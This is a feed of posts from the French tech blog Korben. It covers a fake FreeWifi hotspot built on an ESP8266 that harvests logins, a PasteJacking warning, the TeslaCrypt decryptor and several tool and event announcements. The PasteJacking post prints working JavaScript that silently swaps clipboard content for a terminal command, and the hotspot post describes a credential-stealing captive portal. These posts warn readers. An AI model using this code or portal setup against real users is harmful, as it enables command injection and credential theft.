Korben Upgrade your mind 2016-05-28T21:26:46Z http://korben.info/feed/atom WordPress Korben http://korben.info/auteur <![CDATA[Wifi ouvert – Attention aux faux hotspot ! (+ une démo avec un module Arduino)]]> http://korben.info/?p=78472 2016-05-26T08:12:41Z 2016-05-26T07:30:22Z Vous kiffez le hotspot wifi gratuit ? Les FreeWifi et ce genre de trucs offerts par votre opérateur ? C'est bien, mais êtes vous certains que vous vous connectez vraiment sur un vrai spot et pas sur un truc destiné à pomper tous vos mots de passe ? C'est difficile de le savoir mais pour > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Wifi ouvert – Attention aux faux hotspot ! (+ une démo avec un module Arduino) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Vous kiffez le hotspot wifi gratuit ? Les FreeWifi et ce genre de trucs offerts par votre opérateur ? C'est bien, mais êtes vous certains que vous vous connectez vraiment sur un vrai spot et pas sur un truc destiné à pomper tous vos mots de passe ?

C'est difficile de le savoir mais pour vous montrer à quel point de genre de chose est simple à mettre en oeuvre, je vais vous présenter le petit montage de Kevin, qui m'a envoyé la vidéo suivante. On peut y voir un faux "vrai" hotspot FreeWifi, qui est le même portail captif que celui de Free. En s'y connectant, l'OS de l'imprudent va afficher automatiquement la page de connexion (demande de login / mot de passe) au réseau.

On peut faire ça avec n'importe quelle machine mais lui a choisi le module ESP8266 NodeMCU qui est une board compatible Arduino intégrant une puce wifi et tout ce qu'il faut pour brancher un câble micro-USB.

NodeMCU-dev-kit

Après vous pouvez utiliser ce module ESP8266 dans sa version 01 qui est un peu plus petit mais il faudra vous débrouiller avec le port GPIO.

Le module tiens dans la main est peut-être alimenter en 5v avec une batterie externe et vous vous en doutez, peut-être planqué n'importe où.

Dans l’exemple le module intègre un serveur HTTP, un serveur DHCP et un DNS menteur qui redirige tous les domaines vers le serveur web. Et il est possible avec un petit bout de JavaScript de rediriger les gens sur l'url wifi.free.fr pour faire encore plus vrai dans la barre d'adresse. Evidemment, on peut "copier" n'importe quel autre type de portail captif.

Ensuite, les mecs rentrent leurs identifiants et toutes les données récupérées sont stockées dans un fichier texte dans la mémoire interne (de 3 Mo).

Niveau firmware, Kevin a utilisé celui d'Arduino qui est parfaitement utilisable avec l'IDE (environnement de devà Arduino. Mais il est aussi possible de développer ça en MicroPython et faire des mises à jour via OTA (Over the air). Il y a pas mal d'exemples ici. Au-delà de ça, ce module ESP8266 est compatible avec tout ce qui se branche sur Arduino. Par exemple, Kevin a réalisé une station météo avec des batteries li-on, un double relais 230V avec un module relai Arduino.

Bref, c'était l'occasion pour moi de vous présenter ce module mais aussi les risques associés aux bornes wifi publiques.

Et encore un grand merci à Kevin pour ses précieux renseignements.

Cet article merveilleux et sans aucun égal intitulé : Wifi ouvert – Attention aux faux hotspot ! (+ une démo avec un module Arduino) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Un outil pour imprimer et polir des objets 3D]]> http://korben.info/?p=78465 2016-05-25T10:33:20Z 2016-05-25T10:33:20Z Si vous faites de l'impression 3D, vous serez peut-être intéressé par ce nouveau projet baptisé Polysmooth & Polysher qui se compose d'un filament spécial PVB compatible avec n'importe quelle imprimante 3D et d'une machine qui permet de polir l'objet imprimé. Ce plastique étant sensible à l'éthanol ou l'isopropanol, la machine lui balance des micros gouttelettes (en > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Un outil pour imprimer et polir des objets 3D ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Si vous faites de l'impression 3D, vous serez peut-être intéressé par ce nouveau projet baptisé Polysmooth & Polysher qui se compose d'un filament spécial PVB compatible avec n'importe quelle imprimante 3D et d'une machine qui permet de polir l'objet imprimé.

3d7c55d698c942d08b5e10a1b7792149_original

Ce plastique étant sensible à l'éthanol ou l'isopropanol, la machine lui balance des micros gouttelettes (en aérosol) d'alcool, ce qui a pour effet de dissoudre légèrement la surface de l'objet imprimé en 3D et de le rendre lisse.

c5dcb73894b1d291fc407900cd935473_original

Et voici ce que ça donne :

Bon moi j'ai plus de sous cette année, mais c'est un projet Kickstarter qui a déjà largement éclaté son objectif et qui pourrait vous plaire.

Merci à Kageno pour l'info.

Cet article merveilleux et sans aucun égal intitulé : Un outil pour imprimer et polir des objets 3D ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Prêtez et emprunter gratuitement grâce au site Mutum]]> http://korben.info/?p=78459 2016-05-25T22:49:39Z 2016-05-25T10:11:17Z On a tous chez nous des tas d'objets dont on se sert presque pas, voire pas du tout. Vélo, jeux, appareils de cuisine, tente, enceintes, livres, tondeuse, escabeau, raquettes, appareil à crêpes, rollers, karcher, escabeau, skis, sac à dos...... Il suffit de regarder autour de vous, et vous allez en trouver plein ! Jonathan et ses > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Prêtez et emprunter gratuitement grâce au site Mutum ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
On a tous chez nous des tas d'objets dont on se sert presque pas, voire pas du tout. Vélo, jeux, appareils de cuisine, tente, enceintes, livres, tondeuse, escabeau, raquettes, appareil à crêpes, rollers, karcher, escabeau, skis, sac à dos...... Il suffit de regarder autour de vous, et vous allez en trouver plein !

Jonathan et ses associés, lecteurs de Korben, ont imaginé un excellent concept de prêt et d'emprunt d'objets entre particuliers. Sur leur site Mutum (mon code parrain c'est a2tSdTtd), vous pourrez référencer les objets que vous souhaitez mettre à disposition autour de vous, fixer une caution pour ceux qui ont de la valeur et établir un calendrier de prêt.

Screenshot 2016-05-25 12.02.23

Si vous cherchez à emprunter un objet, il vous suffit de faire une petite recherche et de réserver l'objet qui vous intéresse via le site. Il n'y a pas d'argent en jeu, mais une monnaie virtuelle baptisée le Mutum que vous gagnerez en prêtant vos objets et que vous dépenserez en empruntant les objets des autres. Le site Mutum ne prend pas de commission et tout est gratuit. D'ailleurs, on ne peut pas spéculer avec le Mutum puisqu'il n'est pas convertible en véritable argent et se périme au bout d'un an.

Screenshot 2016-05-25 12.01.35

C'est top pour faire des économies, s'entraider entre voisins, et lier des contacts avec les gens autour de chez vous.

Screenshot 2016-05-25 12.06.56

À expérimenter !

Un outil pour imprimer et polir des objets 3D

Cet article merveilleux et sans aucun égal intitulé : Prêtez et emprunter gratuitement grâce au site Mutum ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[La Nuit du Hack 2016 c’est bientôt ! Pensez à réserver votre place !]]> http://korben.info/?p=78444 2016-05-24T14:26:42Z 2016-05-24T13:34:08Z Je ne sais pas ce que vous faites du 2 au 3 juillet, mais moi je serai du côté de Disneyland Paris pour assister à la Nuit du Hack 2016. Ça va démarrer le samedi à partir de 9h avec une journée-conférences et de Bug Bounty dont voici le détail : 10h00 : Keynote : > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : La Nuit du Hack 2016 c’est bientôt ! Pensez à réserver votre place ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Je ne sais pas ce que vous faites du 2 au 3 juillet, mais moi je serai du côté de Disneyland Paris pour assister à la Nuit du Hack 2016. Ça va démarrer le samedi à partir de 9h avec une journée-conférences et de Bug Bounty dont voici le détail :

10h00 : Keynote : À venir.

10h30 : Ouverture Bug Bounty

10h45 : (FR) Windows 10 - Security and Privacy par Paul Hernault

11h30 : (EN) Tails - Security, Maintainability and Usability, pick three! par Julien Vosin

12h15 : (FR) Microservices hacking & security par Clad

13h00 : Pause

13h45 : Bounty time

14h00 : (EN) A Dozen Years of Shellphish: From DEFCON to the DARPA Cyber Grand Challenge par Antonio Bianchi

14h45 : (FR) Review of the ZigBee security of a famous French set-top box par Renaud Lifchitz

15h30 : (EN) An In-Depth Dive into the Ethereum Protocol par Lefteris Karapetsas

17h00 : Bounty Time

17h15 : (FR) House intercoms attacks: when frontdoors become backdoors par Sébastien Dudek

18h00 : (EN) Improvised LockPicking tools par Till Lenze et Alexandre Triffault

18h45 : (FR) Turning a GPS-based dating application into a tracking system par Julien Szlamowicz et Julien Legras

19h30 : (EN) Developing x64dbg par Duncan Ogilvie

21h00 : Bounty Time

21h15 : (FR) Mass-pwning with a small IoT spy bug par Damien Cauquil

22h00 : (EN) Trust No One. ATMs and their dirty little secrets par Olga Kochetova

Évidemment, comme d'habitude ces 24h seront aussi l'occasion de participer à des challenges, d'assister à un CTF avec les meilleures équipes de hackers, sans oublier les ateliers qui vous permettront d'expérimenter de nouvelles choses (lockpicking, Arduino, vie privée, robotique, analyse de malware...etc.).

YesWeHack sera aussi présent pour mettre en relation les recruteurs et les experts en sécurité qui cherchent du boulot, et si vous emmenez vos enfants, sachez qu'ils ne s'ennuieront pas grâce à l'espace NDH Kids où ils apprendront à bidouiller des tas de trucs.

Lors de cette Nuit du Hack, vous pourrez aussi alerter d'éventuels problèmes de sécurité lors du confessionnal Zataz (Hâte de voir Damien Bancal en aube blanche). Quant à moi, je me baladerai là bas donc on aura le temps de papoter et faire des photos dans tous les sens.

Si tout ça vous plait, sachez que jusqu'au 1er juin, la place est à 50 €. Après cette date, ça passera à 66 €.

Pour vous inscrire c'est par ici.

Cet article merveilleux et sans aucun égal intitulé : La Nuit du Hack 2016 c’est bientôt ! Pensez à réserver votre place ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Bibliovore – Lisez vos livres électroniques sous Windows 10 sans vous faire mal aux yeux]]> http://korben.info/?p=78432 2016-05-25T03:30:02Z 2016-05-24T11:30:00Z Jusqu'à présent, le seul logiciel trop méga cool que je connaissais pour gérer ma bibliothèque de livres électroniques, c'était Calibre. Puis là, je viens de tomber par hasard sur Bibliovore, un outil de gestion de bibliothèque numérique pour Windows 8.x / 10 uniquement. Voici les fonctionnalités : Supporte deux des formats de livre numérique les > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Bibliovore – Lisez vos livres électroniques sous Windows 10 sans vous faire mal aux yeux ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Jusqu'à présent, le seul logiciel trop méga cool que je connaissais pour gérer ma bibliothèque de livres électroniques, c'était Calibre. Puis là, je viens de tomber par hasard sur Bibliovore, un outil de gestion de bibliothèque numérique pour Windows 8.x / 10 uniquement.

apps.6606.9007199266380520.27536de3-0268-4731-847d-3d6c3930d178

apps.54594.9007199266380520.f56e32e2-1255-41d3-b062-a619029d0a26

apps.6019.9007199266380520.7e59f38d-807a-42a2-8cdd-823f4f207404

Voici les fonctionnalités :

  • Supporte deux des formats de livre numérique les plus populaires : EPUB et PDF
  • Ajoutez vos livres un par un ou plusieurs simultanément dans votre bibliothèque, puis organisez les selon vos souhaits
  • Ouverture rapide des livres
  • Reprise de lecture
  • Accès direct par la table des matières
  • Ajout de marque-pages personnalisés
  • Réglage des paramètres de police de lecture pour un meilleur confort
  • Mode jour / nuit
  • Gestion des thèmes de lecture (Noir sur blanc, sépia, etc.)
  • Respect de la mise en page de l'éditeur du livre
  • Recherche au sein de la bibliothèque
  • Editez les métadonnées de vos livres pour mieux les organiser
  • Parcourez et téléchargez des livres directement au sein de Bibliovore depuis des bibliothèques en ligne (OPDS).
  • Lecture partagée sur plusieurs appareils (avancement et paramètres de lecture)
  • Mode portrait / Mode paysage
  • Mode une page / deux pages
  • Livres multivolumes pris en charge au sein des séries

Il est assez joli et si vous avez une tablette Surface, je pense que ça va vous être bien utile !

Bonne lecture à tous !

Cet article merveilleux et sans aucun égal intitulé : Bibliovore – Lisez vos livres électroniques sous Windows 10 sans vous faire mal aux yeux ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Attention au PasteJacking (et merci de ne pas copier coller cet article)]]> http://korben.info/?p=78430 2016-05-24T08:18:51Z 2016-05-24T08:18:51Z La technique n'est pas nouvelle et j'ai déjà abordé le problème en 2015. En gros, il est possible avec un simple bout de javascript, de mettre autre chose dans le presse-papier de l'ordinateur en cas de copier coller. Cela peut poser de nombreux soucis notamment sur les sites qui donnent des lignes de commande que > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Attention au PasteJacking (et merci de ne pas copier coller cet article) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
La technique n'est pas nouvelle et j'ai déjà abordé le problème en 2015. En gros, il est possible avec un simple bout de javascript, de mettre autre chose dans le presse-papier de l'ordinateur en cas de copier coller.

Cela peut poser de nombreux soucis notamment sur les sites qui donnent des lignes de commande que les gens copient et collent machinalement. J'ai déjà mis en garde sur le sujet donc je ne reviendrai pas dessus (aller lire l'article linké ci-dessus). Par contre, pour ceux qui veulent comprendre comment ça fonctionne, sachez qu'un bout de code baptisé PasteJacking est disponible sur Github.

Voici le code en question :

<html>
<body>
Copy the text below and run it in your terminal for totally not evil things to happen.
</br>

<p>echo "not evil"</p>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");

//
// *** This styling is an extra step which is likely not required. ***
//
// Why is it here? To ensure:
// 1. the element is able to have focus and selection.
// 2. if element was to flash render it has minimal visual impact.
// 3. less flakyness with selection and copying which **might** occur if
// the textarea element is not visible.
//
// The likelihood is the element won't even render, not even a flash,
// so some of these are just precautions. However in IE the element
// is visible whilst the popup box asking the user for permission for
// the web page to copy to the clipboard.
//

// Place in top-left corner of screen regardless of scroll position.
textArea.style.position = 'fixed';
textArea.style.top = 0;
textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em
// doesn't work as this gives a negative w/h on some browsers.
textArea.style.width = '2em';
textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.
textArea.style.padding = 0;

// Clean up any borders.
textArea.style.border = 'none';
textArea.style.outline = 'none';
textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.
textArea.style.background = 'transparent';
textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {
var successful = document.execCommand('copy');
var msg = successful ? 'successful' : 'unsuccessful';
console.log('Copying text command was ' + msg);
} catch (err) {
console.log('Oops, unable to copy');
}

document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
var ms = 800;
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
copyTextToClipboard('echo "evil"\n');
});

</script>
</body>

</html>

Pour que ça fonctionne, il faut que la victime fasse un CTRL+C (ou CMD + C sous OSX). Si elle fait un clic droit "copier", ça ne fonctionnera pas.

Cet article merveilleux et sans aucun égal intitulé : Attention au PasteJacking (et merci de ne pas copier coller cet article) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[RSyncOSX – Une interface graphique OSX pour RSync]]> http://korben.info/?p=78424 2016-05-24T07:23:49Z 2016-05-24T07:23:49Z Si vous êtes sous Mac et que vous voulez sauvegarder et synchroniser des données entre vos ordinateurs ou avec un serveur distant, une bonne solution est d'utiliser le logiciel libre Rsync. Mais tout le monde n'est pas à l'aise en ligne de commande. C'est pourquoi Thomas Evensen a créé RsyncOSX qui est ni plus ni > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : RSyncOSX – Une interface graphique OSX pour RSync ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Si vous êtes sous Mac et que vous voulez sauvegarder et synchroniser des données entre vos ordinateurs ou avec un serveur distant, une bonne solution est d'utiliser le logiciel libre Rsync.

Mais tout le monde n'est pas à l'aise en ligne de commande. C'est pourquoi Thomas Evensen a créé RsyncOSX qui est ni plus ni moins qu'une interface graphique (GUI) pour RSync.

Il permet donc de faire des sauvegardes incrémentales (ou non d'ailleurs) et des restaurations, soit localement (disque USB par exemple), soit vers des serveurs distants (votre NAS, un serveur web à l'autre bout du monde...etc.). Bref tout pareil qu'avec RSync mais en mode clickodrome.

estimating_Maxfilesize

execute2

À garder dans votre boite à outils.

Sinon, dans le même genre, j'utilise AASync qui fait grosso modo la même chose (via SFTP) sauf qu'il est payant.

Cet article merveilleux et sans aucun égal intitulé : RSyncOSX – Une interface graphique OSX pour RSync ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Fast.com – Outil de mesure ou moyen de pression ?]]> http://korben.info/?p=78401 2016-05-23T08:52:11Z 2016-05-23T11:30:32Z Voici un outil de plus pour mesurer le débit de votre connexion internet. Proposé par Netflix, ce site sans pub et au look ultra minimaliste n'est pas outil de diagnostic. En effet, Fast.com ne permet ni mesure de latence, ni ping, ni même le débit montant (upload). Non, c'est uniquement une mesure du débit descendant (download) entre > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Fast.com – Outil de mesure ou moyen de pression ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Voici un outil de plus pour mesurer le débit de votre connexion internet. Proposé par Netflix, ce site sans pub et au look ultra minimaliste n'est pas outil de diagnostic.

En effet, Fast.com ne permet ni mesure de latence, ni ping, ni même le débit montant (upload). Non, c'est uniquement une mesure du débit descendant (download) entre votre ordinateur et les serveurs de Netflix qui est proposée. Pratique et simple à utiliser pour les Internautes non techniques et probablement un bon moyen de "négocier" avec certains FAI.

Screenshot 2016-05-23 09.57.21

En effet, il semblerait que Netflix ait quelques soucis concernant ses débits, dus à des accords de peering qui tarderaient à venir avec certains fournisseurs d'accès en France et ailleurs dans le monde.

Je suppose donc (mais ce n'est que mon avis) que Netflix souhaite avec cet outil, faire pression sur ces FAI au travers de leurs abonnés, pour que le débit vers son site s'améliore. On peut d'ailleurs lire ceci dans leur FAQ :

Pourquoi Netflix propose-t-il Fast.com ?

Nous souhaitons que nos utilisateurs puissent évaluer la vitesse fournie par leur FAI de façon simple et rapide, sans publicité.

Que faire si la vitesse n'est pas celle pour laquelle je paie ?

Si les résultats obtenus via l'outil Fast.com et d'autres tests indiquent souvent que la vitesse est inférieure à celle pour laquelle vous payez, vous pouvez parler de ces résultats à votre FAI.

Après c'est aussi possible qu'ils s'en servent pour collecter de la donnée (sur les débits) mais comme ils le font déjà via leur site, je ne vois pas vraiment ce que ça va apporter de plus.

Hmm... On verra ce que ça donne. En attendant, ça nous fait un outil de mesure supplémentaire à bookmarker.

Cet article merveilleux et sans aucun égal intitulé : Fast.com – Outil de mesure ou moyen de pression ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Une ambiance nature dans votre téléphone ou votre navigateur pour vous relaxer]]> http://korben.info/?p=78393 2016-05-23T08:02:33Z 2016-05-23T08:30:01Z Vous vous rappelez de Noizio sous OSX qui permet de se détendre en écoutant et combinant des sons de la nature ? Et bien voici Noisli, qui fait la même chose sous iOS, Android et Chrome. Noisli permet de combiner des sons comme la pluie, le feu, le vent, le chant des oiseaux, et de > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Une ambiance nature dans votre téléphone ou votre navigateur pour vous relaxer ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Vous vous rappelez de Noizio sous OSX qui permet de se détendre en écoutant et combinant des sons de la nature ?

Et bien voici Noisli, qui fait la même chose sous iOS, Android et Chrome. Noisli permet de combiner des sons comme la pluie, le feu, le vent, le chant des oiseaux, et de vous les jouer sur une durée de votre choix.

Vous pouvez aussi enregistrer vos mix pour les rejouer plus tard et pour ceux qui son chez Free Mobile, vous pouvez lire toutes ces merveilleuses ambiances sonores offline.

noisli1 noisli2

Génial si vous voulez méditer un peu ou décompresser en fermant les yeux dans les transports. Attention quand même au bruit de la pluie qui peut provoquer une envie pressante ;-)).

a voir ici.

PS : Les trolls c'est bon, mangez-en !

Cet article merveilleux et sans aucun égal intitulé : Une ambiance nature dans votre téléphone ou votre navigateur pour vous relaxer ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Ransomware TeslaCrypt – Le déchiffrement est enfin possible]]> http://korben.info/?p=78387 2016-05-23T07:16:38Z 2016-05-23T07:16:38Z La société ESET ayant remarqué que le ransomware TeslaCrypt était en fin de vie, ils se sont connectés sur le chat du site de paiement de TeslaCrypt pour demander avec culot aux cybercriminels, la clé universelle (master key) de déchiffrement du malware. Et c'est avec surprise que ces derniers ont accepté de la donner à ESET, > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Ransomware TeslaCrypt – Le déchiffrement est enfin possible ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
La société ESET ayant remarqué que le ransomware TeslaCrypt était en fin de vie, ils se sont connectés sur le chat du site de paiement de TeslaCrypt pour demander avec culot aux cybercriminels, la clé universelle (master key) de déchiffrement du malware.

Et c'est avec surprise que ces derniers ont accepté de la donner à ESET, mais aussi de la poster sur leur site (aujourd'hui disparu). C'est une excellente nouvelle. Cela veut dire que si vous avez été frappé par TeslaCrypt et que vous avez conservé votre disque avec les données chiffrées, vous pouvez à nouveau y avoir accès.

Pour cela, il suffit de télécharger cet utilitaire mis en ligne par ESET qui vous permettra de déchiffrer vos fichiers victimes des versions 3.0 à 4.2 de TeslaCrypt.

ESET TeslaCrypt decryptor in action

Comme quoi, c'est toujours utile de garder une copie de ses fichiers chiffrés, on ne sait jamais. Si vous êtes curieux au sujet des ransomwares, je vous invite à lire ces articles et si vous êtes victime d'une de ces saloperies, mais que vous ne savez pas laquelle, allez lire celui-ci.

Source

Cet article merveilleux et sans aucun égal intitulé : Ransomware TeslaCrypt – Le déchiffrement est enfin possible ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Remixjobs débarque à Nantes le 7 juin ! Venez recruter / vous faire recruter. #Votrejob]]> http://korben.info/?p=78228 2016-05-20T14:02:12Z 2016-05-19T13:25:33Z Amis Nantais, j'ai une bonne nouvelle pour vous ! Remixjobs débarque dans votre ville le 7 juin. Dans les locaux du CCO dans la Tour de Bretagne (CCO, Place de Bretagne, 44000 Nantes), nous vous accueillerons avec nos partenaires Atlantic 2.0 pour que vous puissiez rencontrer les meilleures boites du web du secteur ou d'ailleurs. > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Remixjobs débarque à Nantes le 7 juin ! Venez recruter / vous faire recruter. #Votrejob ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Amis Nantais, j'ai une bonne nouvelle pour vous ! Remixjobs débarque dans votre ville le 7 juin.

Dans les locaux du CCO dans la Tour de Bretagne (CCO, Place de Bretagne, 44000 Nantes), nous vous accueillerons avec nos partenaires Atlantic 2.0 pour que vous puissiez rencontrer les meilleures boites du web du secteur ou d'ailleurs.

iAdvize, Lengow, Akeneo et La Fourchette notamment recruteront des candidats au profil développement, design, réseaux, système, exploitation, commerciaux, marketing, gestion de projet, management, et data.

Comme d'habitude, ambiance décontractée de rigueur et un buffet-cocktail sera alimenté tout au long de l’après-midi (de 13h à 18h30).

rjday-nantes

Mais maintenant vous le savez, le RemixJobs Day, c’est aussi une après-midi de conférences tech : le RJTalk !

Le programme détaillé vous sera bientôt dévoilé, mais sachez déjà que vous pourrez assister à une conférence intitulée "Structurer ma première application NodeJS" animée par Julien Breux et François-Guillaume Ribreau, Software Architects chez iAdvize.

Je ne pourrais malheureusement pas y être car je serai en route pour la conférence Que Du Web, mais toute l'équipe Remixjobs sera là pour vous accueillir et échanger avec vous.

  • Si vous voulez vous inscrire en tant que candidat à ce Remixjobs Nantes, cliquez-ici.
  • Si vous êtes recruteur et que vous cherchez des collaborateurs, cliquez-ici.

Bref, n'hésitez pas !

Cet article merveilleux et sans aucun égal intitulé : Remixjobs débarque à Nantes le 7 juin ! Venez recruter / vous faire recruter. #Votrejob ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[RoboBrowser – Une bibliothèque Python pour scraper et faire surfer votre code]]> http://korben.info/?p=78218 2016-05-23T10:51:06Z 2016-05-19T09:06:16Z Si vous voulez simuler une présence humaine sur le web, oubliez les macros qui squattent votre clavier et votre souris et passez à RoboBrowser. Cette bibliothèque Python permet d'aller sur la page web de votre choix, remplir des formulaires, les soumettre, récupérer des contenus ou cliquer sur des liens. C'est un scraper avec des notions > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : RoboBrowser – Une bibliothèque Python pour scraper et faire surfer votre code ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Si vous voulez simuler une présence humaine sur le web, oubliez les macros qui squattent votre clavier et votre souris et passez à RoboBrowser. Cette bibliothèque Python permet d'aller sur la page web de votre choix, remplir des formulaires, les soumettre, récupérer des contenus ou cliquer sur des liens. C'est un scraper avec des notions de navigation web un peu plus poussées.

Alors oui effectivement, cela peut servir à des spammeurs de commentaires, mais je pense que les mecs ne m'ont pas attendu. Par contre, ce qui est cool, c'est que si vous développez vous-même vos outils et que vous vous connectez à des plateformes extérieures qui n'ont pas d'API, il est parfaitement envisageable grâce à RoboBrowser, d'intégrer ces plateformes dans vos workflows.

Voici un exemple de code où RoboBrowser est utilisé pour récupérer les paroles d'une chanson :

import re
from robobrowser import RoboBrowser

# Browse to Genius
browser = RoboBrowser(history=True)
browser.open('http://genius.com/')

# Search for Porcupine Tree
form = browser.get_form(action='/search')
form                # <RoboForm q=>
form['q'].value = 'porcupine tree'
browser.submit_form(form)

# Look up the first song
songs = browser.select('.song_link')
browser.follow_link(songs[0])
lyrics = browser.select('.lyrics')
lyrics[0].text      # \nHear the sound of music ...

# Back to results page
browser.back()

# Look up my favorite song
song_link = browser.get_link('trains')
browser.follow_link(song_link)

# Can also search HTML using regex patterns
lyrics = browser.find(class_=re.compile(r'\blyrics\b'))
lyrics.text         # \nTrain set and match spied under the blind...

Et voici un autre exemple ou RoboBrowser est utilisé pour remplir un formulaire :

from robobrowser import RoboBrowser
browser = RoboBrowser()
browser.open('http://twitter.com')

# Get the signup form
signup_form = browser.get_form(class_='signup')
signup_form         # <RoboForm user[name]=, user[email]=, ...

# Inspect its values
signup_form['authenticity_token'].value     # 6d03597 ...

# Fill it out
signup_form['user[name]'].value = 'python-robot'
signup_form['user[user_password]'].value = 'secret'

# Submit the form
browser.submit_form(signup_form)

Cet article merveilleux et sans aucun égal intitulé : RoboBrowser – Une bibliothèque Python pour scraper et faire surfer votre code ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
0
Korben http://korben.info/auteur <![CDATA[Edito du 18/05/2016]]> http://korben.info/?p=78211 2016-05-18T08:23:27Z 2016-05-18T08:23:27Z Hello tout le monde, je suis de retour du Var avec des tas d'idées, des trucs à raconter et des bons souvenirs plein la tête. Ce FPV AirShow était exceptionnel. Je me grouille de rédiger un truc qui déchire pour que vous sachiez tout sur cet événement et sur les drones de course. Mais en > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Edito du 18/05/2016 ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Hello tout le monde,

je suis de retour du Var avec des tas d'idées, des trucs à raconter et des bons souvenirs plein la tête. Ce FPV AirShow était exceptionnel. Je me grouille de rédiger un truc qui déchire pour que vous sachiez tout sur cet événement et sur les drones de course.

Mais en attendant, retour à la réalité avec une boite mail en carafe qu'il faut que je répare (j'ai atteins mes 50 Go de stockage alors je vide petit à petit) et quelques milliers de news à dépiler dans Feedly.

Donc je cravache et tout devrait rentrer dans l'ordre rapidement ;-)

Passez une excellente fin de semaine.

K.

Cet article merveilleux et sans aucun égal intitulé : Edito du 18/05/2016 ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Conférence QueDuWeb – Les mouettes, la mer et moi ;-)]]> http://korben.info/?p=78181 2016-05-11T14:36:55Z 2016-05-12T07:30:30Z Vous connaissez Deauville ? Moi j'aime bien, c'est sympa comme ville... y'a la mer, le casino, et des tas de Parisiens. Et surtout, le 8, 9 et 10 juin, il y a une super conférence qui s'appelle Que Du Web. Sur 3 jours, ça va donc causer d'e-commerce, de SEO (et black hat), de webmarketing, > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Conférence QueDuWeb – Les mouettes, la mer et moi ;-) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Vous connaissez Deauville ? Moi j'aime bien, c'est sympa comme ville... y'a la mer, le casino, et des tas de Parisiens.

Et surtout, le 8, 9 et 10 juin, il y a une super conférence qui s'appelle Que Du Web. Sur 3 jours, ça va donc causer d'e-commerce, de SEO (et black hat), de webmarketing, de e-tourisme, de rédaction web, d'UX...etc. Bref, de web avec 56 invités qui vous parleront chacun de leur spécialité.

Il y aura par exemple Eric Leandri, CEO de Qwant qui parlera des nouveautés du moteur de recherche; Marie-Solène Mirrione, social media manager chez Pernod Ricard qui parlera de son expérience et de sa vision dans un grand groupe; Christophe Henner de Webedia Gaming qui parler de webmarketing, les frères Peyronnet qui parleront référencement...etc.

Screenshot 2016-05-11 16.19.58

Et puis il y aura moi !

Bon comme je ne savais pas sur quoi j'allais faire ma conf, je leur ai répondu pour déconner "Ma vie, mon oeuvre"... Puis finalement, je me suis dit que ce serait quand même sympa de parler de ces 12 années de blogging et de tous les défis que j'ai du relever. Donc j'ai préparé une petite conf sur tout ça... Je ne vous en dis pas plus : Surpraïze !

Si ça vous intéresse, vous trouverez toutes les infos ici.

Et comme je suis le plus populaire du lycée, j'ai même un code promo rien que pour vous qui vous donnera droit à 15% de réduction sur les places.

Ce code c'est : "mercikorben".

En plus je suis content d'y aller, ça fait un bail que je n'ai pas vu la mer. Bon, on se voit là bas ?

